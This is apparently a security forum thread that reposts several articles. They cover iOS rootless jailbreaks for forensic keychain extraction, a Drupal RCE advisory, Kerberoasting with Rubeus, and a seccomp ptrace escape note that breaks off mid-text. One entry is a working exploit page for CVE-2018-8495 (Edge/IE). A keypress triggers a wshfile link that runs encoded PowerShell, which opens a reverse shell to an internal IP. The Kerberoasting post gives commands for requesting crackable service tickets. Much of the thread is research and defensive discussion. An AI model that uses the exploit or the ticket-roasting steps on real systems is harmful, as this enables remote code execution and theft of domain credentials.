To be continued Our research and therefore this blog post is far from finished. We only wanted to get this information out as soon as possible in order to first verify that we have pinpointed the right location before we invest further resources into maybe chasing down the wrong bug. Please check back in a few days to see if we have updated this post. Trainings If you are interested in this kind of content please consider signing up for one of our upcoming trainings. Stefan Esser Sursa: https://www.antid0te.com/blog/19-02-23-ios-kernel-cve-2019-7287-memory-corruption-vulnerability.html
-
The new generation of jailbreaks has arrived. Available for iOS 11 and iOS 12 (up to and including iOS 12.1.2), rootless jailbreaks offer significantly more forensically sound extraction compared to traditional jailbreaks. Learn how rootless jailbreaks are different from classic jailbreaks, why they are better for forensic extractions and what traces they leave behind. Privilege Escalation If you follow our blog, you might have already seen articles on iOS jailbreaking. In case you didn't, here are a few recent ones to get you started:
Physical Extraction and File System Imaging of iOS 12 Devices
Using iOS 11.2-11.3.1 Electra Jailbreak for iPhone Physical Acquisition
iPhone Physical Acquisition: iOS 11.4 and 11.4.1
In addition, we published an article on technical and legal implications of iOS file system acquisition that's totally worth reading. Starting with the iPhone 5s, Apple's first iOS device featuring a 64-bit SoC and Secure Enclave to protect device data, the term "physical acquisition" has changed its meaning. In earlier (32-bit) devices, physical acquisition used to mean creating a bit-precise image of the user's encrypted data partition. By extracting the encryption key, the tool performing physical acquisition was able to decrypt the content of the data partition. Secure Enclave locked us out. For 64-bit iOS devices, physical acquisition means file system imaging, a higher-level process compared to acquiring the data partition. In addition, the iOS keychain can be obtained and extracted during the acquisition process. Low-level access to the file system requires elevated privileges. Depending on which tool or service you use, privilege escalation can be performed by directly exploiting a vulnerability in iOS to bypass the system's security measures. This is what tools such as GrayKey and services such as Cellebrite do. If you go this route, you have no control over which exploit is used. You won't know exactly which data is being altered on the device during the extraction, and what kind of traces are left behind post extraction. In iOS Forensic Toolkit, we rely on public jailbreaks to circumvent iOS security measures. The use of public jailbreaks as opposed to closed-source exploits has its benefits and drawbacks. The obvious benefit is the lower cost of the entire solution and the fact that you can choose the jailbreak to use. On the other hand, classic jailbreaks leave far too many traces, making them a bit overkill for the purpose of file system imaging. A classic jailbreak has to disable signature checks to allow running unsigned code. A classic jailbreak would include Cydia, a third-party app store that requires additional layers of development to work on jailbroken devices. In other words, classic jailbreaks such as Electra, Meridian or unc0ver carry too many extras that aren't needed or wanted in the forensic world. There is another issue with classic jailbreaks. In order to gain superuser privileges, these jailbreaks remount the file system and modify the system partition. Even after you remove the jailbreak post extraction, the device you were investigating will never be the same. It may or may not take OTA iOS updates, and it may (and often will) become unstable in operation. A full system restore through iTunes followed by a factory reset is often required to bring the device back to normal. Rootless Jailbreak Explained With classic jailbreaks being what they are, we actively searched for a different solution.
It was at that moment that the rootless jailbreak arrived. Rootless jailbreaks have a significantly smaller footprint compared to classic ones. While offering everything required for file system extraction (including an SSH shell), they don't bundle unwanted extras such as the Cydia store. Most importantly, rootless jailbreaks do not alter the content of the system partition, which makes it possible for the expert to remove the jailbreak and return the system to a clean pre-jailbroken state. All this makes using rootless jailbreaks a significantly more forensically sound procedure compared to using classic jailbreaks. So how exactly is a rootless jailbreak different from a full-root jailbreak? Let's take a closer look. What is a regular jailbreak? A common definition of a jailbreak is "privilege escalation for the purpose of removing software restrictions imposed by Apple". In addition, "jailbreaking permits root access." Root access means being able to read (and write) to the root of the file system. A full jailbreak grants access to "/" in order to give the user the ability to run unsigned software packages while bypassing Apple restrictions. Giving access to the root of the file system requires a file system remount. The jailbreak would then write some files to the system partition, thus modifying the device and effectively breaking OTA functionality. Why do classic jailbreaks need to write anything onto the system partition? The thing is, kppless jailbreaks cannot execute binaries in the user partition. Such attempts fail with "Operation not permitted". Obviously, apps installed from the App Store are located on the user partition and can run without a problem; the problem is getting unsigned binaries to run. The lazy way of achieving this task was putting binaries onto the system partition and going from there. What is a rootless jailbreak then? "Rootless doesn't mean without root, it means without ability to write in the root partition" (redmondpie). Just as the name implies, a rootless jailbreak does not grant access to the root of the file system ("/"). The lowest level to which access is provided is the /var directory. This is considered to be a lot safer as nothing can modify or change system files to cause irreparable damage. Is It Safe? This is a valid question we've been asked a lot. If you read the Physical Extraction and File System Imaging of iOS 12 Devices, you could see that installing the rootless jailbreak involves using a third-party Web site. Exposing an iPhone being investigated to Internet connectivity can be risky, especially if you don't have the authority to make Apple block all remote lock/remote wipe requests originating via the Find My iPhone service. We are currently researching the possibility of installing the jailbreak offline. If you need full transparency and accountability, you can compile your own IPA file from source code: https://github.com/jakeajames/rootlessJB3 You will then have to sign the IPA file and sideload it onto the iOS device you're about to extract, at which point the device will still have to verify the validity of the certificate by connecting to an Apple server. More information about the development of the rootless jailbreak can be found in the following write-up: How to make a jailbreak without a filesystem remount as r/w Rootless Jailbreak: Modified Data and Life Post Extraction The rootless jailbreak is available in source code. Because of this, one can analyze what data exactly is altered on the device.
Knowing what is modified, experts can include this information in their reports. At the very least, rootlessJB modifies the following data on the device:
/var/containers/Bundle/Application/rootlessJB – the jailbreak itself
/var/containers/Bundle/iosbinpack64 – additional binaries and utilities
/var/containers/Bundle/iosbinpack64/LaunchDaemons – launch daemons
/var/containers/Bundle/tweaksupport – filesystem simulation where tweaks and stuff get installed
Symlinks include: /var/LIB, /var/ulb, /var/bin, /var/sbin, /var/Apps, /var/libexec
In addition, we expect to see some traces in various system logs. This is unavoidable with any extraction method, with or without a jailbreak. The only way to completely avoid traces in iOS system logs would be imaging the device through DFU mode or the like, followed by the decryption of the data partition (which is not possible on any modern iOS device). Conclusion The rootless jailbreak is the foundation that allows us to image the file system on Apple devices running all versions of iOS from iOS 12.0 to 12.1.2. In essence, rootless jailbreaks have everything that forensic experts need, and bundle none of the unwanted stuff included with full jailbreaks. The rootless jailbreak grants access to /var instead of /, which makes it safer and easier to remove without long-lasting consequences. While not fully forensically sound, a rootless jailbreak is much closer to offering a clean extraction compared to classic "full jailbreaks". Sursa: https://blog.elcomsoft.com/2019/02/ios-12-rootless-jailbreak/
-
-
-
Physical Extraction and File System Imaging of iOS 12 Devices February 21st, 2019 by Oleg Afonin The new generation of jailbreaks has arrived for iPhones and iPads running iOS 12. Rootless jailbreaks offer experts the same low-level access to the file system as classic jailbreaks – but without their drawbacks. We've been closely watching the development of rootless jailbreaks, and developed full physical acquisition support (including keychain decryption) for Apple devices running iOS 12.0 through 12.1.2. Learn how to install a rootless jailbreak and how to perform physical extraction with Elcomsoft iOS Forensic Toolkit. Jailbreaking and File System Extraction We've published numerous articles on iOS jailbreaks and their connection to physical acquisition. Elcomsoft iOS Forensic Toolkit relies on public jailbreaks to gain access to the device's file system, circumvent iOS security measures and access device secrets allowing us to decrypt the entire content of the keychain including keychain items protected with the highest protection class. If you're interested in jailbreaking, read our article on using iOS 11.2-11.3.1 Electra jailbreak for iPhone physical acquisition. The Rootless Jailbreak While iOS Forensic Toolkit does rely on public jailbreaks to circumvent the many security layers in iOS, it does not need or use those parts that jailbreak developers spend most of their efforts on. A classic jailbreak performs many steps needed to allow running third-party software and to install the Cydia store, none of which are required for physical extraction. Classic jailbreaks also remount the file system to gain access to the root of the file system, which again is not necessary for physical acquisition. For iOS 12 devices, the Toolkit makes use of a different class of jailbreaks: the rootless jailbreak. A rootless jailbreak has a significantly smaller footprint compared to traditional jailbreaks since it does not use or bundle the Cydia store. Unlike traditional jailbreaks, a rootless jailbreak does not remount the file system. Most importantly, a rootless jailbreak does not alter the content of the system partition, which makes it possible for the expert to remove the jailbreak after the acquisition without requiring a system restore to return the system partition to its original unmodified state. All this makes using rootless jailbreaks a significantly more forensically sound procedure compared to using classic jailbreaks. Note: Physical acquisition of iOS 11 devices makes use of a classic (not rootless) jailbreak. More information: physical acquisition of iOS 11.4 and 11.4.1 Steps to Install rootlessJB If you read our previous articles on jailbreaking and physical acquisition, you've become accustomed to the process of installing a jailbreak with Cydia Impactor. However, at this time there is no ready-made IPA file to install a rootless jailbreak in this manner. Instead, you can either compile the IPA from the source code (https://github.com/jakeajames/rootlessJB3) or follow the much simpler procedure of sideloading the jailbreak from a Web site. To install rootlessJB, perform the following steps. Note: rootlessJB currently supports iPhone 6s, SE, 7, 7 Plus, 8, 8 Plus, iPhone X. Support for iPhone 5s and 6 has been added but is still unstable. Support for iPhone Xr, Xs and Xs Max is expected and is in development. On the iOS device you're about to jailbreak, open ignition.fun in Safari. Select rootlessJB by Jake James. Click Get. The jailbreak IPA will be sideloaded to your device.
Open the Settings app and trust the newly installed Enterprise or Developer certificate. Note: a passcode (if configured) is required to trust the certificate. Tap rootlessJB to launch the app. Leave iSuperSU and Tweaks options unchecked and tap the “Jailbreak” button. You now have unrestricted access to the file system. Imaging the File System In order to extract data from an Apple device running iOS 12, you will need iOS Forensic Toolkit 5.0 or newer. You must install a jailbreak prior to extraction. Launch iOS Forensic Toolkit by invoking the “Toolkit-JB” command. Connect the iPhone to the computer using the Lightning cable. If you are able to unlock the iPhone, pair the device by confirming the “Trust this computer?” prompt and entering device passcode. If you cannot perform the pairing, you will be unable to perform physical acquisition. You will be prompted to specify the SSH port number. By default, the port number 22 can be specified by simply pressing Enter. From the main window, enter the “D” (DISABLE LOCK) command. This is required in order to access protected parts of the file system. From the main window, enter the “F” (FILE SYSTEM) command. You will be prompted to enter the root password. By default, the root password is ‘alpine’. You may need to enter the password several times. The file system image will be dumped as a single TAR archive. Wait while the file system is being extracted. This can be a lengthy process. When the process is finished, disconnect the device and proceed to analyzing the data. Decrypting the Keychain Physical acquisition is the only method that allows decrypting all keychain items regardless of their protection class. In order to extract (and decrypt) the keychain, perform the following steps (assuming that you have successfully paired and jailbroken the device). Launch iOS Forensic Toolkit by invoking the “Toolkit-JB” command. Connect the iPhone to the computer and specify the SSH port number (as described above). You will be prompted to enter the root password. By default, the root password is ‘alpine’. You may need to enter the password several times. From the main window, enter the “D” (DISABLE LOCK) command. This is required in order to access protected parts of the file system. Now enter the “K” (KEYCHAIN) command. You will be prompted for a path to save the keychain XML file. Specify iOS version (obviously, the second option). Enter ‘alpine’ when prompted for a password. The content of the keychain will be extracted and decrypted. When the process is finished, disconnect the device and proceed to analyzing the data. Note: if you see an error message asking to unlock the device, unlock the iPhone and make sure to use the “D” command to disable screen lock. Analyzing the Data You can use Elcomsoft Phone Viewer to analyze the TAR file. In order to view the content of the keychain, you’ll need Elcomsoft Phone Breaker. Sursa: https://blog.elcomsoft.com/2019/02/physical-extraction-and-file-system-imaging-of-ios-12-devices/
-
That's a good question, and it's difficult to answer. It depends on many things: 1. What kind of terms and conditions they have 2. Which legislation applies 3. The country where the server on which the WordPress theme will appear is located 4. How the parties involved react ...
-
Hi. Alfa. But I don't know where you could get it from.
-
Another Critical Flaw in Drupal Discovered — Update Your Site ASAP! February 21, 2019 Wang Wei Developers of Drupal—a popular open-source content management system that powers millions of websites—have released the latest version of their software to patch a critical vulnerability that could allow remote attackers to hack your site. The update came two days after the Drupal security team released an advance security notification of the upcoming patches, giving website administrators an early heads-up to fix their websites before hackers abuse the loophole. The vulnerability in question is a critical remote code execution (RCE) flaw in Drupal Core that could "lead to arbitrary PHP code execution in some cases," the Drupal security team said. While the Drupal team hasn't released any technical details of the vulnerability (CVE-2019-6340), it mentioned that the flaw exists because some field types do not properly sanitize data from non-form sources, and that it affects Drupal 7 and 8 Core. It should also be noted that your Drupal-based website is only affected if the RESTful Web Services (rest) module is enabled and allows PATCH or POST requests, or it has another web services module enabled. If you can't immediately install the latest update, then you can mitigate the vulnerability by simply disabling all web services modules, or configuring your web server(s) to not allow PUT/PATCH/POST requests to web services resources. "Note that web services resources may be available on multiple paths depending on the configuration of your server(s)," Drupal warns in its security advisory published Wednesday. "For Drupal 7, resources are for example typically available via paths (clean URLs) and via arguments to the "q" query argument. For Drupal 8, paths may still function when prefixed with index.php/." However, considering the popularity of Drupal exploits among hackers, you are strongly advised to install the latest update: If you are using Drupal 8.6.x, upgrade your website to Drupal 8.6.10. If you are using Drupal 8.5.x or earlier, upgrade your website to Drupal 8.5.11. Drupal also said that the Drupal 7 Services module itself does not require an update at this moment, but users should still consider applying other contributed updates associated with the latest advisory if "Services" is in use. Drupal has credited Samuel Mortenson of its security team for discovering and reporting the vulnerability. Sursa: https://thehackernews.com/2019/02/hacking-drupal-vulnerability.html?m=1
-
<!doctype html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=10"> <meta http-equiv="Expires" content="0"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Cache" content="no-cache"> </head> <body> <b>Windows Edge/IE 11 - RCE (CVE-2018-8495)</b> </br></br> <!-- adapt payload since this one connectback on an internal IP address (just a private VM nothing else sorry ;) ) --> <a id="q" href='wshfile:test/../../system32/SyncAppvPublishingServer.vbs" test test;powershell -nop -executionpolicy bypass -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADUANgAuADEAIgAsADgAMAApADsAJABzAHQAcgBlAGEAbQAg AD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEA ZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4 AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMA dAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0 AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4A TABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=;"'>Exploit-it now !</a> <script> window.onkeydown=e=>{ window.onkeydown=z={}; q.click() } </script> </body> </html> Sursa: https://github.com/kmkz/exploit/blob/master/CVE-2018-8495.html
-
-
-
Kerberoasting Revisited Will Feb 20 Rubeus is a C# Kerberos abuse toolkit that started as a port of @gentilkiwi's Kekeo toolset and has continued to evolve since then. For more information on Rubeus, check out the "From Kekeo to Rubeus" release post, the follow-up "Rubeus — Now With More Kekeo", or the recently revamped Rubeus README.md. I've made several recent enhancements to Rubeus, which included me heavily revisiting its Kerberoasting implementation. This resulted in some modifications to Rubeus' Kerberoasting approach(es) as well as an explanation for some previous "weird" behaviors we've seen in the field. Since Kerberoasting is such a commonly used technique, I wanted to dive into detail now that we have a better understanding of its nuances. If you're not familiar with Kerberoasting, there's a wealth of existing information out there, some of which I cover in the beginning of this post. Much of this post won't make complete sense if you don't have a base understanding of how Kerberoasting (or Kerberos) works under the hood, so I highly recommend reading up a bit if you're not comfortable with the concepts. But here's a brief summary of the Kerberoasting process: An attacker authenticates to a domain and gets a ticket-granting-ticket (TGT) from the domain controller that's used for later ticket requests. The attacker uses their TGT to issue a service ticket request (TGS-REQ) for a particular servicePrincipalName (SPN) of the form sname/host, e.g. MSSqlSvc/SQL.domain.com. This SPN should be unique in the domain, and is registered in the servicePrincipalName field of a user or computer account. During this request process, the attacker can specify what Kerberos encryption types they support (RC4_HMAC, AES256_CTS_HMAC_SHA1_96, etc). If the attacker's TGT is valid, the DC extracts information from the TGT and stuffs it into a service ticket. Then the domain controller looks up which account has the requested SPN registered in its servicePrincipalName field. The service ticket is encrypted with the hash of the account with the requested SPN registered, using the highest level encryption key that both the attacker and the service account support. The ticket is sent back to the attacker in a service ticket reply (TGS-REP). The attacker extracts the encrypted service ticket from the TGS-REP. Since the service ticket was encrypted with the hash of the account linked to the requested SPN, the attacker can crack this encrypted blob offline to recover the account's plaintext password. A note on terminology. The three main encryption key types we're going to be referring to in this post are RC4_HMAC_MD5 (ARCFOUR-HMAC-MD5, where an account's NTLM hash functions as the key), AES128_CTS_HMAC_SHA1_96, and AES256_CTS_HMAC_SHA1_96. For conciseness I'm going to refer to these as RC4, AES128, and AES256. Also, all examples here are run from a Windows 10 client, against a Server 2012 domain controller with a 2012 R2 domain functional level. Kerberoasting Approaches Kerberoasting generally takes one of two approaches: A standalone implementation of the Kerberos protocol that's used through a device connected on a network, or via piping the crafted traffic in through a SOCKS proxy. Examples would be Meterpreter or Impacket. This requires credentials for a domain account to perform the roasting, since a TGT needs to be requested for use in the later service ticket requests.
Using built-in Windows functionality on a domain-joined host (like the .NET KerberosRequestorSecurityToken class) to request tickets which are then extracted from the current logon session with Mimikatz or Rubeus. Alternatively, a few years ago @machosec realized the GetRequest() method can be used to carve out the service ticket bytes from KerberosRequestorSecurityToken, meaning we can forgo Mimikatz for ticket extraction. Another advantage of this approach is that the existing user's TGT is used to request the service tickets, meaning we don't need plaintext credentials or a user's hash to perform the Kerberoasting. With Kerberoasting, we really want RC4 encrypted service ticket replies, as these are orders of magnitude faster to crack than their AES equivalents. If we implement the protocol on the attacker side, we can choose to indicate we only support RC4 during the service ticket request process, resulting in the easier-to-crack hash format. On the host side, I used to believe that the KerberosRequestorSecurityToken approach requested RC4 tickets by default as this is typically what is returned, but in fact the "normal" ticket request behavior occurs, where all of the client's supported ciphers are specified. So why are RC4 hashes usually returned by this approach? Time for a quick detour. msDS-SupportedEncryptionTypes One defensive indicator we've talked about in the past is "encryption downgrade activity". As modern domains (functional level 2008 and above) and computers (Vista/2008+) support using AES keys by default in Kerberos exchanges, the use of RC4 in any Kerberos ticket-granting-ticket (TGT) requests or service ticket requests should be an anomaly. Sean Metcalf has an excellent post titled "Detecting Kerberoasting Activity" that covers how to approach DC events to detect this type of behavior, though as he notes "false positives are likely." The full answer to why false positives are such a problem with this approach also explains some of the "weird" behavior I've seen over the years with Kerberoasting. To illustrate, let's say we have a user account sqlservice that has MSSQLSvc/SQL.testlab.local registered in its servicePrincipalName (SPN) property. We can request a service ticket for this SPN with powershell -C "Add-Type -AssemblyName System.IdentityModel; $Null=New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/SQL.testlab.local'". However, the resulting service ticket applied to the current logon session specifies RC4, despite the requesting user's (harmj0y) TGT using AES256. As stated previously, for a long time I thought the KerberosRequestorSecurityToken approach for some reason specifically requested RC4. However, looking at a Wireshark capture of the TGS-REQ (Kerberos service ticket request) from the client we see that all proper encryption types including AES are specified as supported: The enc-part in the returned TGS-REP (service ticket reply) is properly encrypted with the requesting client's AES256 key as we would expect. However, the enc-part we care about for Kerberoasting (contained within the returned service ticket) is encrypted with the RC4 key of the sqlservice account, NOT its AES key: So what's going on? It turns out that this has nothing to do with the KerberosRequestorSecurityToken method.
This method requests a service ticket for the supplied SPN so it can build an AP-REQ containing the service ticket for SOAP requests, and we can see above that it performs proper "normal" requests and states it supports AES encryption types. This behavior is due to the msDS-SupportedEncryptionTypes domain object property, something that was talked about a bit by Jim Shaver and Mitchell Hennigan in their DerbyCon "Return From The Underworld: The Future Of Red Team Kerberos" talk. This property is a 32-bit unsigned integer defined in [MS-KILE] 2.2.7 that represents a bitfield with the following possible values: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/6cfc7b50-11ed-4b4d-846d-6f08f0812919 According to Microsoft's [MS-ADA2], "The Key Distribution Center (KDC) uses this information [msDS-SupportedEncryptionTypes] while generating a service ticket for this account." So even if a domain supports AES encryption (i.e. domain functional level 2008 and above) the value of the msDS-SupportedEncryptionTypes field on the account with the requested SPN registered is what determines the encryption level for the service ticket returned in the Kerberoasting process. According to MS-KILE 3.1.1.5 the default value for this field is 0x1C (RC4_HMAC_MD5 | AES128_CTS_HMAC_SHA1_96 | AES256_CTS_HMAC_SHA1_96 = 28) for Windows 7+ and Server 2008R2+. This is why service tickets for machines nearly always use AES256, as the highest mutually supported encryption type will be used in a Kerberos ticket exchange. We can confirm this by doing a dir \\primary.testlab.local\C$ command followed by Rubeus.exe klist: However, this property is only set by default on computer accounts, not user accounts. If this property is not defined, or is set to 0, [MS-KILE] 3.3.5.7 tells us the default behavior is to use a value of 0x7, meaning RC4 will be used to encrypt the service ticket. So in the previous example for the MSSQLSvc/SQL.testlab.local SPN that's registered to the user account sqlservice we received a ticket using the RC4 key. If we select "This account supports AES [128/256] bit encryption" in Active Directory Users and Computers, then msDS-SupportedEncryptionTypes is set to 24, specifying that only AES 128/256 encryption should be supported. When I was first looking at this, I assumed that since the msDS-SupportedEncryptionTypes value was non-null and the RC4 bit was NOT present, if you specified only RC4 when requesting a service ticket (via the /tgtdeleg flag here) for an account configured this way, the exchange would error out. But guess what? We still get an RC4 (type 23) encrypted ticket that we can crack! A Wireshark capture confirms that RC4 is the only supported etype in the request, and that the ticket enc-part is indeed encrypted with RC4. ¯\_(ツ)_/¯ I'm assuming that this is for failsafe backwards compatibility reasons, and I ran this scenario in multiple test domains with the same result. However someone else I asked to recreate it wasn't able to, so I'm not sure if I'm missing something or if this accurately reflects normal domain behavior. If anyone has any more information on this, or is/isn't able to recreate it, please let me know! Why does the above matter? If true, it implies that there doesn't seem to be an easy way to disable RC4_HMAC on user accounts.
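As a quick reference for the values quoted above (0x1C, 24 and the 0x7 fallback), here is a small C sketch that decodes the msDS-SupportedEncryptionTypes bitfield using the flag values from MS-KILE 2.2.7; the helper itself is purely illustrative:

#include <stdio.h>
#include <stdint.h>

/* Bit flags from MS-KILE 2.2.7 (only the commonly used ones shown). */
#define DES_CBC_CRC                 0x01
#define DES_CBC_MD5                 0x02
#define RC4_HMAC_MD5                0x04
#define AES128_CTS_HMAC_SHA1_96     0x08
#define AES256_CTS_HMAC_SHA1_96     0x10

static void decode(uint32_t v) {
    printf("%2u =%s%s%s%s%s\n", v,
           (v & DES_CBC_CRC)             ? " DES-CRC" : "",
           (v & DES_CBC_MD5)             ? " DES-MD5" : "",
           (v & RC4_HMAC_MD5)            ? " RC4"     : "",
           (v & AES128_CTS_HMAC_SHA1_96) ? " AES128"  : "",
           (v & AES256_CTS_HMAC_SHA1_96) ? " AES256"  : "");
}

int main(void) {
    decode(0x1C); /* 28: default for Win7+/2008R2+ computer accounts      */
    decode(24);   /* AES only: the "This account supports AES" checkboxes */
    decode(0x7);  /* fallback used when the attribute is missing or zero  */
    return 0;
}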
This means that even if you enable AES encryption for user accounts with servicePrincipalName fields set, these accounts are still Kerberoastable with the hacker-friendly RC4 flavor of encryption keys! After a bit of testing, it appears that if you disable RC4 at the domain/domain controller level as described in this post, then requesting a RC4 service ticket for any account will fail with KDC_ERR_ETYPE_NOTSUPP. However, TGT requests will no longer work with RC4 either. As this might cause lots of things to break, definitely try this in a lab environment first before making any changes in production. Sidenote: the msDS-SupportedEncryptionTypes property can also be set for trustedDomain objects that represent domain trusts, but it is also initially undefined. This is why inter-domain trust tickets end up using RC4 by default: However, like with user objects, this behavior can be changed by modifying the properties of the trusted domain object, specifying that the foreign domain supports AES: This sets msDS-SupportedEncryptionTypes on the trusted domain object to a value of 24 (AES128_CTS_HMAC_SHA1_96 | AES256_CTS_HMAC_SHA1_96), meaning that AES256 inter-domain trust tickets will be issued by default: Trying to Build a Better Kerberoast Due to the way we tend to execute engagements, we often lean towards abusing host-based functionality versus piping in our own protocol implementation from an attacker server. We oftentimes operate over high-latency command and control, so for complex multi-party exchanges like Kerberos our personal preference has traditionally been the KerberosRequestorSecurityToken approach for Kerberoasting. But as I mentioned in the first section, this method requests the highest supported encryption type when requesting a service ticket. For user accounts that have AES enabled, this default method will return a ticket with an encryption type of AES256 (type 18 in the hash): Now, an obvious alternative method for Rubeus' Kerberoasting would be to allow an existing TGT blob/file to be specified that would then be used in the ticket requests. If we have a real TGT and are implementing the raw TGS-REQ/TGS-REP process and extracting out the proper encrypted parts manually, we can specify whatever encryption type support we want when issuing the service ticket request. So if we have AES-enabled accounts, we can still get an RC4 based ticket to crack offline! This approach is in fact now implemented in Rubeus with the /ticket:<blob/file.kirbi> parameter for the kerberoast command. So what's the disadvantage here? Well, you need a ticket-granting-ticket to build the raw TGS-REQ service ticket request, so you need to either a) be elevated on a system and extract out another user's TGT or b) have a user's hash that you use with the asktgt module to request a new TGT. If you're curious why a user can't extract out a usable version of their TGT without elevation, check out the explanation in the "Rubeus — Now With More Kekeo" post. The solution is @gentilkiwi's Kekeo tgtdeleg trick, which uses the Kerberos GSS-API to request a "fake" delegation for a target SPN that has unconstrained delegation enabled (e.g. cifs/DC.domain.com). This was previously implemented in Rubeus with the tgtdeleg command. This approach allows us to extract a usable TGT for the current user, including the session key. Why don't we then use this "fake" delegation TGT when performing our TGS-REQs for "vulnerable" SPNs, specifying RC4 as the only encryption algorithm we support?
The new kerberoast /tgtdeleg option does just that! There have also been times in the field where the default KerberosRequestorSecurityToken Kerberoasting method has just failed; we're hoping that the /tgtdeleg option may work in some of these situations. If we want to go a bit further and avoid the possible "encryption downgrade" indicator, we can search for accounts that don't have AES encryption types supported, and then state we support all encryption types in the service ticket request. Since the highest supported encryption type for the results will be RC4, we'll still get crackable tickets. The kerberoast /rc4opsec command executes the tgtdeleg trick and filters out any of these AES-enabled accounts: If we want the opposite and only want AES-enabled accounts, the /aes flag will apply the opposite LDAP filter. While we don't currently have tools to crack tickets that use AES (and even once we do, speeds will be thousands of times slower due to the AES key derivation algorithms), progress is being made. Another advantage of the /tgtdeleg approach for Kerberoasting is that since we're building and parsing the TGS-REQ/TGS-REP traffic manually, the service tickets won't be cached on the system we're roasting from. The default KerberosRequestorSecurityToken method results in a service ticket being cached in the current logon session for every SPN we're roasting. The /tgtdeleg approach results in a single additional cifs/DC.domain.com ticket being added to the current logon session, minimizing a potential host-based indicator (i.e. massive numbers of service tickets in a user's logon session). As a reference, in the README I built a table comparing the different Rubeus Kerberoasting approaches: As a final note, Kerberoasting should work much better over domain trusts as of this commit. Two foreign trusted domain examples have been added to the kerberoast section of the README. Conclusion Hopefully this cleared up some of the confusion some (like me) may have had surrounding different encryption support with regard to Kerberoasting. I'm also eager for people to try out the new Rubeus roasting options to see how they work in the field. As always, if I made a mistake in this post, let me know and I'll correct it as soon as I can! Also, if anyone has insight on the RC4-tickets-still-being-issued-for-AES-only-accounts situation, please shoot me an email (will [at] harmj0y.net) or hit me up in the BloodHound Slack. Sursa: https://posts.specterops.io/kerberoasting-revisited-d434351bd4d1
-
/* The seccomp.2 manpage (http://man7.org/linux/man-pages/man2/seccomp.2.html) documents: Before kernel 4.8, the seccomp check will not be run again after the tracer is notified. (This means that, on older ker‐ nels, seccomp-based sandboxes must not allow use of ptrace(2)—even of other sandboxed processes—without extreme care; ptracers can use this mechanism to escape from the sec‐ comp sandbox.) Multiple existing Android devices with ongoing security support (including Pixel 1 and Pixel 2) ship kernels older than that; therefore, in a context where ptrace works, seccomp policies that don't blacklist ptrace can not be considered to be security boundaries. The zygote applies a seccomp sandbox to system_server and all app processes; this seccomp sandbox permits the use of ptrace: ================ ===== filter 0 (164 instructions) ===== 0001 if arch == AARCH64: [true +2, false +0] [...] 0010 if nr >= 0x00000069: [true +1, false +0] 0012 if nr >= 0x000000b4: [true +17, false +16] -> ret TRAP 0023 ret ALLOW (syscalls: init_module, delete_module, timer_create, timer_gettime, timer_getoverrun, timer_settime, timer_delete, clock_settime, clock_gettime, clock_getres, clock_nanosleep, syslog, ptrace, sched_setparam, sched_setscheduler, sched_getscheduler, sched_getparam, sched_setaffinity, sched_getaffinity, sched_yield, sched_get_priority_max, sched_get_priority_min, sched_rr_get_interval, restart_syscall, kill, tkill, tgkill, sigaltstack, rt_sigsuspend, rt_sigaction, rt_sigprocmask, rt_sigpending, rt_sigtimedwait, rt_sigqueueinfo, rt_sigreturn, setpriority, getpriority, reboot, setregid, setgid, setreuid, setuid, setresuid, getresuid, setresgid, getresgid, setfsuid, setfsgid, times, setpgid, getpgid, getsid, setsid, getgroups, setgroups, uname, sethostname, setdomainname, getrlimit, setrlimit, getrusage, umask, prctl, getcpu, gettimeofday, settimeofday, adjtimex, getpid, getppid, getuid, geteuid, getgid, getegid, gettid, sysinfo) 0011 if nr >= 0x00000068: [true +18, false +17] -> ret TRAP 0023 ret ALLOW (syscalls: nanosleep, getitimer, setitimer) [...] 002a if nr >= 0x00000018: [true +7, false +0] 0032 if nr >= 0x00000021: [true +3, false +0] 0036 if nr >= 0x00000024: [true +1, false +0] 0038 if nr >= 0x00000028: [true +106, false +105] -> ret TRAP 00a2 ret ALLOW (syscalls: sync, kill, rename, mkdir) 0037 if nr 